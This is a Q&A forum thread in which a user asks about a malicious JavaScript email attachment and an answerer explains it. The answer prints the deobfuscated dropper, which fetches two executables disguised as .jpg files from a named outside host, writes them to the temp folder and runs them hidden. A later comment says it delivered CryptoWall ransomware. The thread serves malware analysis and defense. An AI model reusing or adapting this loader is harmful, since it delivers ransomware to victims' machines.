-7

If anybody knows what is going on in this java script file, could you please tell me? A client of ours got this as a email and well... Now she cant open up any docs or spreadsheets. Also looks like it spread to the rest of the network.

If somebody could help me make sense of it, I would be most grateful.

I've deleted it, not something I want anybody else to get hold of.

I probably don't need to tell anybody, but please don't open it unless it's in a sandbox. I am not responsible if you brick your PC.

Source: PM me for the file rather..

IT kid
  • 43
  • 4
  • it is using `WScript.Shell` to do something, not sure what yet, ill look into it – epoch Mar 13 '15 at 07:59
  • Linking in that manner, to what you think is a virus, is careless. I hope most people read before clicking, and that they don't allow activeX content to run from unknown domains obviously. – Mackan Mar 13 '15 at 07:59

1 Answers1

3

Basically, it's downloading a virus to your temp folder and executing it...

You should run a virus scan on the entire network.

var AxProxy = function() {};

(function () {
    function fFh(fr, Klw, rn) {
        var VeZ = new AxProxy('WScript.Shell');
        var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw;
        var OG4 = new AxProxy('MSXML2.XMLHTTP');

        OG4['onReadyStateChange'] = function() {
            if (OG4['readyState'] === 4) {
                var g38 = new AxProxy('ADODB.Stream');

                g38['open']();
                g38['type'] = 1;
                g38['write'](OG4['ResponseBody']);
                g38['position'] = 0;
                g38['saveToFile'](Klw, 2);
                g38['close']();
            }
        };

        try {
            OG4['open']('GET', fr, false);
            OG4['send']();

            if (rn > 0) {
                VeZ['Run'](Klw, 0, 0);
            }
        } catch (er) {};
    }

    fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
    fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();

All the other variables are just gibberish intended to confuse and discourage decoding.

PS: I've proxied ActiveXObject so this can't be run...

epoch
  • 16,396
  • 4
  • 43
  • 71
  • Just for interest sake if anybody wanted to know. It creates a backdoor to upload somebody elses cryptowall virus and speads it like nothing ive ever seen. Deleting the code. Could a mod please close and lock this? – IT kid Mar 13 '15 at 09:51